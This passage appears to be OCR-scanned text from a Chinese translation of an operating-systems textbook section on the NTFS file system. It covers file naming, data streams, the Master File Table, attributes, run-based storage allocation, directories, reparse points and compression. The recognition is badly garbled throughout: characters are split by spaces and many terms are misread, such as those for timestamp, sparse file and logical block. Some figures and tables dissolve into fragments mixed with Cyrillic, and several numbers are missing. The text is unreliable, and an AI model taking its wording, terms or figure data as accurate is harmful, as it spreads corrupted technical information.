Unicode 编 码 ， 允 许 非 拉 丁 语系 国家 的 用 户 (如 和 希 腾 、 日 本 、 印 度 、 俄 罗斯 和 以 色 列 ) 用 他 们 的 母语 为 
文件 命名 。 例 如 ，prAe 就 是 一 个 完全 合法 的 文件 名 。NTFS 完 全 支持 区 分 大 小 写 的 文件 名 (所 以 foo 与 
Foo 和 FOO 是 不 同 的 )。Win32 API 不 完全 支持 区 分 大 小 写 的 文件 名 ， 并 且 根本 不 支持 区 分 大 小 写 的 目录 
名 。 为 了 保持 与 UNIX 系 统 的 兼容 ， 当 运行 POSIX 子 系统 时 ，Windows 提 供 区 分 大 小 写 的 支持 。Win32 不 
区 分 大 小 写 ， 但 是 它 保 持 大 小 写 状态 ， 所 以 文件 名 可 以 包含 大 写字 母 和 小 写字 母 。 尽 管区 分 大 小 写 是 一 
个 UNIX 用 户 非常 熟悉 的 特性 ， 但 是 对 一 般 用 户 而 言 ， 这 是 很 不 方便 的 。 例 如 ， 现 在 的 互联 网 在 很 大 程 
度 上 是 不 区 分 大 小 写 的 。 

与 FAT32 和 UNIX 文 件 不 同 ，NTFS 文 件 并 不 只 是 字 节 的 一 个 线性 序列 ， 而 是 一 个 文件 由 很 多 属性 组 
成 ， 每 个 属性 由 一 个 字 节 流 表示 。 大 部 分 文件 都 包含 一 些 短 字 节 流 (如 文件 名 和 64 位 的 对 象 ID)， 和 一 
个 包含 数据 的 未 命名 的 长 字 节 流 。 当 然 ， 一 个 文件 也 可 以 有 两 个 或 多 个 数据 流 〈( 即 长 字 节 流 )。 每 个 流 
有 一 个 由 文件 名 、 一 个 冒号 和 一 个 流 名 组 成 的 名 字 ， 例 如 ，foo:stream1。 每 个 流 有 自己 的 大 小 ， 并 且 相 
对 于 所 有 其 他 的 流 都 是 可 以 独立 锁定 的 。 一 个 文件 中 存在 多 个 流 的 想法 在 NTFS 中 并 不 新 鲜 。 苹 果 
Macintosh 的 文件 系统 为 每 个 文件 使 用 两 个 流 ， 一 个 数据 分 支 (data fork) 和 一 个 资源 分 支 (resource 
fork)。NTFS 中 多 数据 流 的 首次 使 用 是 为 了 允许 一 个 NT 文件 服务 器 为 Macintosh 用 户 提供 服务 。 多 数据 
流 也 用 于 表示 文件 的 元 数据 ， 例 如 Windows GUI 中 使 用 的 JPEG 图 像 的 缩 略图 。 但 是 ， 多 数据 流 很 脆弱 
并 且 在 传输 文件 到 其 他 文件 系统 ,通过 网 络 传输 文件 甚至 在 文件 备份 和 后 来 恢复 的 过 程 中 都 会 丢失 文件 。 
这 是 因为 很 多 工具 都 忽略 了 它们 。 

与 UNIX 文 件 系统 类 似 ，NTFS 是 一 个 层次 化 的 文件 系统 。 名 字 的 各 部 分 之 间 用 “\” 分 隔 ， 而 不 是 
“/”， 这 是 从 MS-DOS 时 代 与 CP/M 相 兼容 的 需求 中 继承 下 来 的 。 与 UNIX 中 当前 工作 目录 的 概念 不 同 的 是 ， 
作为 文件 系统 设计 的 一 个 基础 部 分 的 链接 到 当前 目录 (.) 和 父 目录 (..) 的 硬 连 接 ， 在 Windows 是 作为 
一 种 惯例 来 是 实现 的 。 系 统 仅 在 其 中 的 POSIX 子 系统 里 支持 硬 连接 ， 正 因为 这 样 ，NTFS 支 持 对 目录 的 
遍历 检查 (UNIX 中 的 “x” 权 限 )。 

从 Windows Vista 开 始 ， NTFS 才 开始 支持 符号 链接 。 为 了 避免 如 Spoofing 这 样 的 安全 问题 (当年 在 
UNIX 4.2BSD 第 一 次 引入 符号 链接 时 就 遇 到 过 )， 通 常 只 允许 系统 管理 员 来 创建 符号 链接 。 在 Vista 中 符 
号 链接 的 实现 用 到 一 个 叫 再 解析 点 (reparse points) 的 NTFS 特 性 (将 在 本 节 后续 部 分 讨论 ) 。 另 外 ， 
NTFS 也 支持 压缩 、 加 密 、 容 错 、 日 志和 稀疏 文件 。 我 们 马上 就 会 探讨 这 些 特性 及 其 实现 。 


11.8.2 NTFS 文 件 系统 的 实现 

NTFS 文 件 系统 是 专门 为 NT 系统 开发 的 ， 用 来 替代 OS/2 中 的 HPFS 文 件 系统 的 。 它 是 一 个 具有 很 高 
复杂 性 和 精密 性 的 文件 系统 。NT 系 统 的 大 部 分 是 在 陆地 上 设计 的 。 从 这 方面 看 ，NTFS 与 NT 系统 其 他 部 
分 相 比 是 独 一 ， 因 为 它 的 很 多 最 初 设计 都 是 在 一 艘 驶 出 普 吉 特 湾 的 帆船 的 甲板 上 完成 的 (严格 遵 
守 上 午 工作 ， 下 午 喝 啤酒 的 作息 协议 )。 

接 下 来 ， 我 们 将 从 NTFS 结 构 开始 ， 探 讨 一 系列 NTFS 特 性 ， 包 括 文件 名 查找 、 文 件 压缩 、 日 志和 加 密 。 

1. 文件 系统 结构 

每 个 NTFS 卷 (如 磁盘 分 区 ) 都 包含 文件 、 目 录 、 位 图 和 其 他 数据 结构 。 每 个 卷 被 组 织 成 磁盘 块 的 
一 个 线形 序列 (在 微软 的 术语 中 叫 “ 簇 ")， 每 个 卷 中 块 的 大 小 是 固定 的 。 根 据 卷 的 大 小 不 同 ， 块 的 大 小 
从 512 字 节 到 64KB 不 等 。 大 多 数 NTFS 磁 盘 使 用 KB 的 块 ， 作为 有 利于 高 效 传输 的 大 块 和 有 利于 减少 内 
部 碎片 的 小 块 之 间 的 折 中 办 法 。 每 个 块 用 其 相对 于 卷 起 始 位 置 的 64 位 偏 移 量 来 指示 。 

每 个 卷 中 的 主要 数据 结构 叫 MFT ( 主 文件 表 ，Master File Table) ， 该 表 是 以 1KB 为 固定 大 小 的 记录 
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的 线形 序列 。 每 个 MFT 记 录 擅 述 一 个 文件 或 目录 。 它 包含 了 如 文件 名 、 时 间 蕉 、 文 件 中 的 块 在 磁盘 上 的 
地 址 的 列表 等 文件 属性 。 如 果 一 个 文件 非常 大 ， 有 时 候 会 需要 两 个 或 更 多 的 MFT 记 录 来 保存 所 有 块 的 地 
址 列表 。 这 时 ， 第 一 个 MFT 记 录 叫 做 基本 记录 (base record) ， 该 记录 指向 其 他 的 MFT 记 录 。 这 种 溢出 方 
案 可 以 追溯 到 CP/MM， 那 时 每 个 目录 项 称 为 一 个 范围 (extent) 。 用 一 个 位 图 记录 哪个 MFT 表 项 是 空闲 的 。 

MFT 本 身 就 是 一 个 文件 ， 可 以 被 放 在 卷 中 的 任何 位 置 ， 这 样 就 避免 了 在 第 一 磁道 上 出 现 错误 扁 区 引 
起 的 问题 。 而 且 MFT 可 以 根据 需要 变 大 ， 最 大 可 以 有 2” 个 记录 。 

图 11-41 是 一 个 MFT。 每 个 MFT 记 录 由 数据 对 (属性 头 , 值 ) 的 一 个 序列 组 成 。 每 个 属性 由 一 个 说 明 
了 该 属性 是 什么 和 属性 值 有 多 长 的 头 开始 。 一 些 属性 值 是 变 长 的 ， 如 文件 名 和 数据 。 如 果 属 性 值 足够 短 能 
够 放 到 MFT 记 录 中 ， 那么 就 把 它 放 到 记录 里 。 这 叫做 直接 文件 (immediate file, [Mullender апа Tanenbaum, 
1984])。 如 果 属 性 值 太 长 ， 它 将 被 放 在 磁盘 的 
其 他 位 置 ， 并 在 MFT 记 录 里 存放 一 个 指向 它 的 
指针 。 这 使 得 NTFS 对 于 小 的 域 ( 即 那些 能 够 放 
人 MFT 记 录 中 的 域 ) 非常 有 效率 。 

最 开始 的 16 个 MFT 记 录 为 NTFS 元 数据 文 
件 而 预 留 ， 如 图 11-41 所 示 。 每 一 个 记录 描述 
了 一 个 正常 的 具有 属性 和 数据 块 的 文件 ， 就 如 
同 其 他 文件 一 样 。 这 些 文件 中 每 一 个 都 由 “$” 
开始 表明 它 是 一 个 元 数据 文件 。 第 一 个 记录 摘 
述 了 MFT 文 件 本 身 。 它 说 明了 MFT 文 件 的 块 都 
放 在 哪里 以 确保 系统 能 找到 MFT 文 件 。 很 明显 ， 
Windows 需 要 一 个 方法 找到 MFT 文 件 中 第 一 个 
块 ， 以 便 找 到 其 余 的 文件 系统 信息 。 找 到 MFT 
文件 中 第 一 个 块 的 方法 是 查看 启动 块 ， 那 是 卷 
被 格式 化 为 文件 系统 时 地 址 所 存放 的 位 置 。 

记录 1 是 MFT 文 件 早期 部 分 的 复制 。 这 部 
分 信息 非常 重要 ， 因 此 拥有 第 二 份 拷贝 至 关 重 
要 以 防 MFT 的 第 一 块 坏 掉 。 记 录 2 是 一 个 Log 
文件 。 当 对 文件 系统 做 结构 性 的 改变 时 , 例如 ， 
增加 一 个 新 目录 或 删除 一 个 现 有 目录 ， 动 作 在 执行 前 就 记录 在 Log 里 ， 从 而 增加 在 这 个 动作 执行 时 出 错 
后 〈 比 如 一 次 系统 崩 误 ) 被 正确 恢复 的 机 会 。 对 文件 属性 做 的 改变 也 会 记录 在 这 里 。 事实 上 ， 唯 一 不 会 
记录 的 改变 是 对 用 户 数据 的 改变 。 记 录 3 包 含 了 卷 的 信息 ， 比 如 大 小 、 卷 标 和 版 本 。 

上 面 提 到 ， 每 个 MFT 记 录 包 含 一 个 (属性 头 , 值 ) 数据 对 的 序列 。 属性 在 SAttrDef 文 件 中 定义 。 这 
个 文件 的 信息 在 MFT 记 录 4 里 。 接 下 来 是 根 目录 ， 根 目录 本 身 是 一 个 文件 并 且 可 以 变 为 任意 长 度 。MFT 
记录 5 用 来 描述 根 目录 。 

着 里 的 空余 空间 通过 一 个 位 图 来 跟踪 。 这 个 位 图 本 身 是 一 个 文件 ， 它 的 磁盘 地 址 和 属性 由 MFT 记 录 
6 给 出 。 下 一 个 MFT 记 录 指 向 引导 装载 程序 。 记 录 8 用 来 把 所 有 的 坏 块 链接 在 -起 来 确保 不 会 有 文件 使 用 
它们 。 记 录 9 包 含 安全 信息 。 记 录 10 用 于 大 小 写 映射 。 对 于 拉丁 字母 A-Z， 映射 是 非常 明确 的 (至 少 是 对 
说 拉丁 语 的 人 来 说 )。 对 于 其 他 语言 的 映射 ， 如 希腊、 亚美尼亚 或 乔治 亚 ， 就 对 于 讲 拉丁 语 的 人 不 太 明 
确 ， 这 个 文件 告诉 我 们 如 何 做 。 最 后 ， 记 录 11 是 一 个 目录 包含 杂项 文件 用 于 磁盘 配额 、 对 象 标识 符 、 
再 解析 点 ， 等 等 。 最 后 四 个 MFT 记 录 被 留 作 将 来 使 用 。 

每 个 MFT 记 录 由 一 个 记录 头 和 后 面 跟着 的 (属性 头 ， 值 ) 对 组 成 。 记录 头 包含 一 个 幻 数 用 于 有 效 性 
检查 ， 一 个 序列 号 (每 次 当 记录 被 一 个 新 文件 再 使 用 时 就 被 更 新 ) ， 文件 引用 记 数 ， 记 录 实 际 使 用 的 字 
节 数 ， 基 本 记录 〈 仅 用 于 扩展 记录 ) 的 标识 符 (索引 ， 序 列 号 )， 和 其 他 - 些 杂 项 。 

NTFS 定 义 了 13 个 属性 能 够 出 现在 MFT 记 录 中 。 图 11-42 列 出 了 这 些 属性 。 每 个 属性 头 标识 了 属性 ， 
给 出 了 长 度 ， 值 字段 的 位 置 ， 一 些 各 种 各 样 的 标记 和 其 他 信息 。 通 常 ， 属性 值 直 接 跟 在 它们 的 属性 头 后 
面 , 但 是 如 果 一 个 值 对 于 一 个 MFT 记 录 太 长 的 话 ， 它 可 能 被 放 在 不 同 的 磁盘 块 中 。 这 样 的 属性 称 作 非 常 
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驻 必 性， 数据 属性 很 明显 就 是 这 样 一 个 属性 。 一 些 属 性 ， 像 名 字 ， 可 能 出 现 重复 ， 但 是 所 有 属性 必须 在 

MFT 记 录 中 按照 固定 顺序 出 现 。 常 驻 属性 头 ГЕ ГЕШ 

有 24 个 字 节 长 ， 非 常 驻 属性 头 会 更 长 ， 因 为 Гао есет тате 

它们 包含 关于 在 磁盘 上 哪些 位 置 能 找到 这 些 。 [文件 名 Unicode 文 件 名 ， 可 能 重复 用 做 MS-DOS 格 式 名 

属性 的 信 安全 描述 符 | 废弃 了 。 安 全 信息 现在 用 $Extend $Secure 表 示 
标准 的 信息 域 包含 文件 所 有 者 、 安 全 信 。 [属性 列表 | 额外 的 MFT 记 录 的 位 置 ， 如 果 需 要 的 话 

息 、POSIX 需 要 的 时 间 崔 、 硬 连接 计数 、 只 [ARID 对 此 卷 叭 一 的 64 位 文件 标识 符 

读 和 存档 位 ， 等 等 。 这 些 域 是 固定 长 度 的 ， кыны. Н ҮП - 

并 且 总 是 存在 的 。 文 件 名 是 一 个 可 变 长 度 5 s Khs 

Unicode 编 码 的 字符 叫 。 为 了 使 具有 非 MS- EES 卷 版 本 ( 仅 用 于 SVolume) 


жон 用 于 目录 
DOS 文 件 名 的 文件 可 以 访问 老 的 16 位 程序， Hise 一 用 于 很 大 的 目 示 


文件 也 可 以 有 一 个 符合 8+3 规 则 的 MS-DOS ra 用 于 很 大 的 目录 
短 名 字 。 如 果实 际 文件 名 符合 8+3 命 名 规则 ，。 | 日 志 工 具 流 | 控制 记录 日 志 到 9LOgFiie 
第 二 个 MS-DOS 文 件 名 就 不 需要 了 。 数据 数据 流 ， 可 以 重复 


在 NT4.0 中 ， 安 全 信息 被 放 在 一 个 属性 

中 ， 但 在 Windows 2000 及 以 后 的 版 本 中 ， 安 кт Ai 及 中 使 用 的 属性 

全 信息 全 部 都 放 在 一 个 单独 的 文件 中 使 得 多 个 文件 可 以 共享 相同 的 安全 描述 。 由 于 安全 信息 对 于 每 个 用 
户 的 许多 文件 来 说 是 相同 的 ， 于 是 这 使 得 许多 MFT 记 录 和 整个 文件 系统 节省 了 大 量 的 空间 。 

当 属性 不 能 全 部 放 在 MFT 记 录 中 时 ,就 需要 使 用 属性 列表 。 这 个 属性 就 会 说 明 在 哪里 找到 扩展 记录 。 
列表 中 的 每 个 条 目 在 MFT 中 包含 一 个 48 位 的 索引 来 说 明 扩展 记录 在 哪里 ， 还 包含 一 个 16 位 的 序号 来 验证 
扩展 记录 与 基本 记录 是 否 匹配 。 

就 像 UNIX 文 件 拥有 一 个 [节点 号 一 样 ，NTFS 文 件 也 有 一 个 ID。 文 件 可 以 依据 ID 被 打开 ， 但 是 由 于 ID 
是 基于 MFT 记 录 的 ， 并 且 可 以 因 该 文件 的 记录 移动 (例如 ， 如 果 文件 因 备份 被 恢复 ) 而 改变 ， 所 以 当 ID 
必须 保持 不 变 时 ， 这 个 NTFS 分 配 的 ID 并 不 总 是 有 用 。NTFS 人 允许 有 一 个 可 以 设置 在 文件 上 而 且 永 远 不 迄 
归 改 变 的 独立 对 象 1D 属性。 举例 来 说 ， 当 一 个 文件 被 拷贝 到 一 个 新 卷 时 ， 这 个 属性 随 着 文件 一 起 过 去 。 

重 解析 点 告诉 分 析 文件 名 的 过 程 来 做 特别 的 事 。 这 个 机 制 用 于 显 式 加 载 文件 系统 和 符号 链接 。 两 个 
郑 属 性 用 于 标示 郑 。 随 后 三 个 属性 处 理 如 何 实现 目录 -小 的 目录 就 是 文件 列表 ， 大 的 目录 使 用 B+ 树 实 
现 。 日 志 工具 流 属性 用 来 加 窗 文件 系统 。 

最 后 ， 我 们 关注 最 重要 的 属性 ; 数据 流 在 一 些 情况 下 叫 流 )。 一 个 NTFS 文 件 有 一 个 或 多 个 数据 流 ， 这 
些 就 是 负载 所 在 。 默 认 数据 法 是 未 命名 的 〈 例 如 ， 目 录 路 径 \ 文 件 名 :: SDATA)， 但 是 替代 数据 流 有 自 
己 的 名 字 ， 例 如 ， 目 录 路 径 \ 文 件 名 ， 流 名 。SDATA。 

对 于 每 个 流 ， 流 的 名 字 (如 果 有 ) 会 在 属性 头 中 。 头 后 曾 要 么 是 说 明了 流 包含 哪些 块 的 磁盘 地 址 列 
表 ， 要 么 是 仅 儿 百 字 节 大 小 的 流 〈 有 许多 这 样 的 流 ) 本 身 。 存 储 了 实际 流 数据 的 MFT 记 录 称 为 主 即 文件 
(Mullender 和 Tanenbaum，1984) 。 

当然 ， 大 多 数 情况 下 ， 数 据 放 不 进 一 个 MFT 记 录 中 ， 因 此 这 个 属性 通常 是 非常 驻 属性 。 现 在 让 我 们 
看 一 看 NTFS 如 何 记录 特殊 数据 中 非常 时 属性 的 位 置 。 

2. 存储 分 配 

保持 对 磁盘 中 在 可 能 的 情况 下 ， 连 续 分 配 的 块 进行 跟踪 的 模型 ， 这 是 出 于 效率 的 原因 。 举 例 来 说 ， 
如 果 一 个 流 的 第 一 个 逻辑 块 放 在 磁盘 上 的 块 20， 那 么 系统 将 努力 把 第 二 个 思 辑 块 放 在 块 21， 第 三 个 池 辑 
块 放 在 块 22， 以 此 类 推 ， 实 现 这 些 行 串 的 一 个 方法 是 尽 可 能 一 次 分 配 许 多 磁盘 块 。 

-个 流 中 的 块 是 通过 一 串 记 录 描述 的 ， 每 个 记录 描述 了 一 中 逻辑 上 连续 的 块 ， 对 于 一 个 没有 孔 的 流 
来 说 ， 只 有 唯一 的 一 个 记录 。 按 从 头 到 尾 的 顺序 写 的 流 都 属于 这 一 类 。 对 于 一 个 包含 一 个 孔 的 流 (例如 ， 
只 有 块 0 一 49 和 块 60 79 被 定义 了 )， 会 有 两 个 记录 。 这 样 的 流 会 产生 于 先 写 入 前 50 个 块 ， 然 后 找到 退 辑 
上 第 60 块 ， 然 后 写 其 他 20 个 块 。 当 孔 被 读 出 时 ， 用 全 零 表示 。 有 孔 的 文件 称 为 稳 跑 文件 。 

每 个 记录 始 于 一 个 头 ， 这 个 头 给 出 第 一 个 块 在 流 中 仿 移 蓝 。 接 着 是 没有 被 记录 覆盖 的 第 一 个 块 的 偏 
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移 量 。 在 上 面 的 例子 中 ， 第 一 个 记录 有 一 个 (0, 50) 的 头 ， 并 会 提供 这 50 个 块 的 磁盘 地 址 。 第 二 个 记 
录 有 一 个 (60，80) 的 头 ， 会 提供 其 他 20 个 块 的 磁盘 地 址 。 

每 个 记录 的 头 后 面 跟着 一 个 或 多 个 对 ， 每 个 对 给 出 了 磁盘 地 址 和 持续 长 度 。 磁 盘 地 址 是 该 磁盘 块 离 
本 分 区 起 点 的 偏 移 量 游程 在 行 串 中 块 的 数量 。 在 一 段 行 串 记录 中 需要 有 多 少 对 就 可 以 有 多 少 对 。 图 
11-43 描 述 了 用 这 种 方式 表示 的 三 段 、9 块 的 流 。 


一 一 ”有关 数据 块 的 信息 一 > 


标准 信息 头 KAk BEK 


Ж фи йй? 块 申 3 
记录 头 、、 ER 
4 


ө! 2 во: з A 


块 编号 20-03 64-65 80-82 
图 11-43 有 3 个 连续 空间 、9 个 块 的 短 流 的 一 条 MFT 记 录 


在 这 个 图 中 ， 有 一 个 9 个 块 ( 头 ，0~8) 的 短 流 的 MFT 记 录 。 它 由 磁盘 上 三 个 行 串 的 连续 块 组 成 。 
第 一 段 是 块 20 ~23， 第 二 段 是 块 64 ~65， 第 三 段 是 80 一 82。 每 一 个 行 串 被 记录 在 MFT 记 录 中 的 一 个 (Ш 
盘 地 址 ， 块 计数 ) 对 中 。 有 多 少 行 串 是 依赖 于 当 流 被 创建 时 磁盘 块 分 配器 在 找 连续 块 的 行 串 时 做 的 有 多 
好 。 对 于 一 个 n 块 的 流 ， 段 数 可 能 是 从 ! 到 n 的 任意 值 。 

有 必要 在 这 里 做 几 点 说 明 ， 

首先 ， 用 这 种 方法 流 的 大 小 没有 上 限 限制 。 在 地 址 不 压缩 的 情况 下 ， 每 一 对 需要 两 个 64 位 数 
表示 ， 总 共 16 字 节 。 然 而 ， 一 对 能 够 表示 100 万 个 甚至 更 多 的 连续 的 磁盘 空间 。 实际 上 ，20M 的 流 包含 
20 个 独立 的 包含 100 万 个 1KB 的 块 的 行 串 ， 每 个 都 可 以 轻易 地 放 在 一 个 MFT 记 录 中 ， 然 而 一 个 60KB 的 被 
分 散 到 60 个 不 同 的 块 的 流 却 不 行 。 

其 次 ， 表 示 每 一 对 的 直截了当 的 方法 会 占用 2 x 8 个 字 节 ， 有 压缩 方法 可 以 把 一 对 的 大 减 小 到 低 于 16 
字 节 。 许 多 磁盘 地 址 有 多 个 高 位 0 字 节 。 这 些 可 以 被 忽略 。 数据 头 能 告诉 我 们 有 多 少 个 高 位 0 字 节 被 忽略 
了 ， 也 就 是 说 ， 在 一 个 地 址 中 实际 上 有 多 少 个 字 节 被 用 。 也 可 以 用 其 他 的 压缩 方式 。 实际 上 ， 一 对 经 常 
只 有 4 个 字 节 。 

第 一 个 例子 是 比较 容易 的 : 所 有 的 文件 信息 能 容纳 在 一 个 MFT 记 录 中 ， 如 果 文 件 比较 大 或 者 是 高 度 
碎片 化 以 至 于 信息 不 能 放 在 一 个 MFT 记 录 当 
中 ， 这 时 会 发 生 什么 呢 ? 答案 很 简单 : 用 两 
个 或 更 多 的 MFT 记 录 。 从 图 11-44 可 以 看 出 ， 
一 个 文件 的 首 MFT 记 录 是 102， 对 于 一 个 
MFT 记 录 而 言 它 有 太 多 的 行囊 ， 因 而 它 会 计 
算 需要 多 少 个 扩展 的 MFT 记 录 。 比 如 说 两 个 ， 
于 是 会 把 它们 的 索引 放 到 首 记录 中 ， 首 记录 
剩余 的 空间 用 来 放 前 k 个 行 串 。 

注意 ， 图 11-44 包 含 了 一 些 多 余 的 信息 。 
理论 上 不 需要 指出 一 品行 串 的 结尾 ， 因 为 这 
些 信息 可 以 从 行 串 对 中 计算 出 来 。 列 出 这 些 信息 是 为 了 更 有 效 地 搜索 ; 找到 在 一 个 给 定 文件 偏 移 量 的 块 ， 
只 需要 去 检查 记录 头 ， 而 不 是 行 串 对 。 

当 MFT 记 录 102 中 所 有 的 空间 被 用 完 后 ， 剩余 的 行 串 继续 在 MFT 记 录 105 中 存放 ， 并 在 这 个 记录 中 


标准 
MFT 信息 
记录 


文件 名 ||о1эә|ж 


图 11-44 需要 三 个 MTF 记 录 存 储 其 所 有 行 申 的 文件 
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放 入 尽 可 能 多 的 项 。 当 这 个 记录 也 用 完 后 ， 剩 下 的 行 串 放 在 MFT 记 录 108 中 。 这 种 方式 可 以 用 多 个 MFT 
记录 去 处 理 大 的 分 段 存储 文件 。 

有 可 能 会 出 现 这 样 的 问题 ， 如 果 文 件 需要 的 MFT 记 录 太 多 ， 以 至 于 首 个 MTF 记 录 中 没有 足够 的 空 
间 去 存放 所 有 的 索引 。 解 决 这 个 问题 的 方法 是 : 使 扩展 的 MFT 记 录 列 表 成 为 非 驻 留 的 ( 即 ， 存 放 在 其 他 
的 硬 笋 区 域 而 不 是 在 首 MFT 记 录 中 )， 这 样 它 就 能 根据 需要 而 增 大 。 

图 11-45 表 示 一 个 MFT 表 项 如 何 描述 一 个 小 目录 。 这 个 记录 包含 若干 目录 项 ， 每 一 个 目录 项 可 以 描 
文件 或 目录 。 每 个 表 项 包含 一 个 定 长 的 结构 体 和 紧 随 其 后 的 不 定 长 的 文件 名 。 定 长 结构 体 包 含 该 
9MFT 表 项 的 索引 、 文 件 名 长 度 以 及 其 他 的 属性 和 标志 。 在 目录 中 查找 一 个 目录 项 需要 依次 检 
查 所 有 的 文件 名 。 


目录 项 包含 该 文件 对 应 的 MFT 表 项 的 索引 、 文 
标准 信息 头 索引 根 头 件 名 长 度 、 文 件 名 本 身 以 及 其 他 的 字段 和 标志 


A 


记录 头 人 


标准 多 
未 使 用 
信息 YA 


图 11-45 描述 小 目录 的 MFT 记 录 


大 目录 采用 一 种 不 同 的 格式 ， 即 用 B+ 树 而 不 是 线性 结构 来 列 出 文件 。 通 过 B+ 树 可 以 按照 字母 顺序 
查找 文件 ， 并 且 更 容易 在 目录 的 正确 位 置 插 人 新 的 文件 名 。 

现在 有 足够 的 信息 去 描述 使 用 文件 名 对 文件 \??\C:\foovbar 的 查找 是 如 何 进行 的 。 从 图 11-22 可 以 知道 
Win32、 原 生 NT 系 统 调用 、 对 象 和 IO 管理 器 如 何 协作 通过 向 C 盘 的 NTFS 设 备 栈 (device stack) 发 送 IO 
请 求 打开 一 个 文件 。L/O 请 求 要 求 NTFS 为 剩余 的 路 径 名 \foo\bar 填 写 一 个 文件 对 象 。 

NTFS 从 C 盘 根 日 录 开 始 分 析 \foo\bar 路 径 。C 盘 的 块 可 以 在 MFT 中 的 第 五 个 表 项 中 找到 (参考 图 11- 
41)。 然 后 在 根 目录 中 查找 字符 囊 “foo”"， 返 回 目录 foo 在 MFT 中 的 索引 ， 接 着 再 查找 字符 申 “bar"， 得 
到 这 个 文件 的 MFT 记 录 的 引用 。NTFS 通 过 调用 安全 引用 管理 器 来 实施 访问 检查 ， 如 果 所 有 的 检查 都 通 
过 了 ，NTFS 从 MFT 记 录 中 搜索 得 到 ::SDATA 属 性 ， 即 默认 的 数据 流 。 

找到 文件 bar 后 ，NTFS 在 IO 管理 器 返回 的 文件 对 象 上 设置 指针 指向 它 自己 的 元 数据 。 元 数据 包括 
指向 MFT 记 录 的 指针 、 压 缩 和 范围 锁 、 各 种 关于 共享 的 细节 等 。 大 多 数 元 数据 包含 在 一 些 数据 结构 中 ， 
这 些 数据 结构 被 所 有 引用 这 个 文件 的 文件 对 象 共享 。 有 一 些 域 是 当前 打开 的 文件 特有 的 ， 比 如 当 这 个 文 
件 被 关闭 时 是 否 需要 删除 。 一 旦 文件 成 功 打开 ，NTFS 调 用 loCompleteRequest， 它 通过 把 IPR 沿 MO 栈 
向 上 传递 给 IO 和 对 象 管理 器 。 最 终 ， 这 个 文件 对 象 的 句柄 被 放 进 当前 进程 的 句柄 表 中 ， 然 后 回 到 用 户 
态 。 之 后 调用 ReadFile 时 ， 应 用 程序 能 够 提供 句柄 ， 该 句柄 表明 C:\foo\bar 文 件 对 象 应 该 包含 在 传递 到 C: 
设备 栈 给 NTFS 的 读 请 求 中 。 

除了 支持 普通 文件 和 目录 外 ，NTFS 支 持 像 UNIX 那 样 的 硬 连 接 ， 也 通过 一 个 叫做 重 解 析 点 的 机 制 支 
持 符号 链接 。NTFS 支 持 把 一 个 文件 或 者 目录 标记 为 一 个 重 解析 点 ， 并 将 其 和 一 块 数据 关联 起 来 。 当 在 文 
件 名 解析 的 过 程 中 遇 到 这 个 文件 或 目录 时 ， 操 作 就 会 失败 ， 这 块 数据 被 返回 到 对 象 管理 器 。 对 象 管理 器 
将 这 块 数据 解释 为 另 一 个 路 径 名 ， 然 后 更 新 需要 解析 的 字符 串 ， 并 重启 IO 操作 。 这 种 机 制 用 来 支持 符号 
链接 和 挂 载 文件 系统 ， 把 文件 搜索 重 定向 到 目录 妓 次 结构 的 另外 一 个 部 分 甚至 到 另外 一 个 不 同 的 分 区 。 

重 解析 点 也 用 来 为 文件 系统 过 滤器 驱动 程序 而 标记 个 别 文件 。 在 图 11-22 中 显示 了 文件 系统 过 滤器 
如 何 安 装 到 1/O 管 理 器 和 文件 系统 之 间 。1/O 请 求 通过 调用 loCompleteRequest 来 完成 ， 共 把 控制 权 转交 
给 在 请 求 发 起 时 设备 栈 上 每 个 驱动 程序 插入 到 IRP 中 的 完成 例 程 。 需 要 标记 一 个 文件 的 驱动 程序 首先 关 
联 一 个 重 解析 标签 ， 然 后 监控 由 于 遇 到 重 解析 点 而 失败 的 打开 文件 操作 的 完成 请 求 。 通 过 用 IRP 传 回 的 
数据 块 ， 驱 动 程序 可 以 判断 出 这 是 否 是 一 个 驱动 程序 自身 关联 到 该 文件 的 数据 块 。 如 果 是 ， 驱 动 程序 将 
停止 处 理 完成 例 程 而 接着 处 理 原来 的 MO 请 求 。 通 常 这 将 引发 一 个 打开 请 求 ， 但 这 时 将 有 一 个 标志 告诉 
NTFS 忽 略 重 解析 点 并 同时 打开 文件 。 
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3. 文件 压缩 

NTFS 支 持 透明 的 文件 压缩 。 一 个 文件 能 够 以 压缩 方式 创建 ， 这 意味 着 当 向 磁盘 中 写 人 数据 块 时 
NTFS 会 自动 尝试 去 压缩 这 些 数据 块 ， 当 这 些 数据 块 被 读 取 时 NTFS 会 自动 解压 。 读 或 写 的 进程 完全 不 知 
道 压缩 和 解压 在 进 

压缩 流程 是 这 样 的 ， 当 NTFS 写 一 个 有 压缩 标志 的 文件 到 磁盘 时 ， 它 检查 这 个 文件 的 前 16 个 逻辑 块 ， 
而 不 管 它们 占用 多 少 个 项 ,然后 对 它们 运行 压缩 算法 ,如 果 压 缩 后 的 数据 能 够 存放 在 15 个 甚至 更 少 的 块 中 ， 
压缩 数据 将 写 到 硬盘 中 ， 如 果 可 能 的 话 ， 这 些 块 在 一 个 行 串 里 。 如 果 压 缩 后 的 数据 仍然 占用 16 个 块 ， 这 16 
个 块 以 不 压缩 方式 写 到 硬盘 中 。 之 后 ， 去 检查 第 16-31 块 看 是 否 能 压缩 到 15 个 甚至 更 少 的 块 ， 以 此 类 推 。 

图 11-46a 显 示 一 个 文件 。 该 文件 的 前 16 块 被 成 功 地 压缩 到 了 8 个 ， 对 第 二 个 16 块 的 压缩 没有 成 功 ， 
第 三 个 16 块 也 压缩 了 50%。 这 三 个 部 分 作为 三 个 行 串 来 写 ， 并 存储 于 MFT 记 录 中 。“ 丢 失 ” 的 块 用 磁盘 
地 址 0 存放 在 MFT 表 项 中 ， 如 图 11-46b 所 示 。 在 图 中 ， 头 (0，48) 后 面 有 五 个 二 元 组 ， 其 中 ， 两 个 对 应 
着 第 一 个 〈 被 压缩 ) 行 串 ， 一 个 对 应 没有 压缩 的 行 串 ， 两 个 对 应 最 后 一 个 〈 被 压缩 ) 行 串 。 

压缩 前 的 文件 
0 Z 16 32 47 


moei 
40 55 85 92 
a) 


磁盘 地 址 30 37 


头 文件 5 个 块 囊 (其 中 有 两 个 为 空 ) 
Н Н Н 2 
ЕЕЕ mafo» 8; 


b) 
图 11-46 а) 一 个 占 48 块 的 文件 被 压缩 到 32 块 的 例子 ，b) 被 压缩 后 文件 对 应 的 MFT 记 录 


当 读 文件 时 ，NTFS 需 要 分 辩 某 个 行 串 是 否 被 压缩 过 ， 它 可 以 根据 磁盘 地 址 进行 分 辨 ， 如 果 其 磁盘 
